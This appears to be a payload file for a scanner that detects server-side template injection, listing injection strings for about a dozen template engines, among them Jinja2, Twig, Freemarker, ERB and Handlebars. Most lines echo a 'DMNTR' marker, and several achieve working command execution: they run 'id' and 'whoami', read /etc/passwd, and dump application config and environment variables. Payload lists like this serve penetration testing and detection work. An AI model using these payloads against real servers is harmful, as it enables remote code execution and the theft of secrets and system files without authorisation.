# SSTI payloads - Server-Side Template Injection
# NO simple math like 7*7 - use complex unique strings

# Jinja2 (Python) - Advanced detection with unique marker
{{'DMNTR'.__class__.__mro__[1].__subclasses__()}}
{{config.items()}}
{{config}}
{{'DMNTR'*3}}
{{request.application.__class__.__name__}}
{{request.application.__globals__.__builtins__.__import__('os').popen('echo DMNTR').read()}}
{{'DMNTR'+config.__class__.__name__}}
{{lipsum.__globals__.os.popen('echo DMNTR').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{joiner.__init__.__globals__.os.popen('whoami').read()}}

# Twig (PHP)
{{_self}}
{{_self.env.display("DMNTR")}}
{{_self.env.getRuntime("Twig\\Runtime\\EscaperRuntime")}}
{{['echo DMNTR']|filter('system')}}
{{'DMNTR'|upper}}
{{dump(_context)}}

# Smarty (PHP)
{php}echo 'DMNTR';{/php}
{$smarty.version}
{system('echo DMNTR')}
{literal}<script>alert('DMNTR')</script>{/literal}

# Freemarker (Java)
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("echo DMNTR")}
${"DMNTR"?upper_case}
${.version}

# Velocity (Java)
#set($x="DMNTR")$x
#set($str=$class.inspect("java.lang.String").type)
$str.getClass().forName("java.lang.Runtime").getRuntime().exec("echo DMNTR")

# ERB (Ruby)
<%= `echo DMNTR` %>
<%= system('echo DMNTR') %>
<%= File.open('/etc/passwd').read %>

# Mako (Python)
<%text>DMNTR</%text>
${self.module.cache.util.os.popen('echo DMNTR').read()}
${"DMNTR".upper()}

# Pebble (Java)
{% set cmd = 'echo DMNTR' %}
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec(cmd) }}

# Thymeleaf (Java)
[[${T(java.lang.Runtime).getRuntime().exec('echo DMNTR')}]]
${T(java.lang.System).getenv()}

# Handlebars (JavaScript)
{{constructor.constructor('return this')().process.mainModule.require('child_process').execSync('echo DMNTR')}}

# Jade/Pug (JavaScript)
#{global.process.mainModule.require('child_process').execSync('echo DMNTR')}

# Tornado (Python)
{% import os %}{{os.popen('echo DMNTR').read()}}
{% raw 'DMNTR' %}

# Generic template detection
${DMNTR}
#{DMNTR}
*{DMNTR}
@{DMNTR}
{{DMNTR}}
<%= DMNTR %>
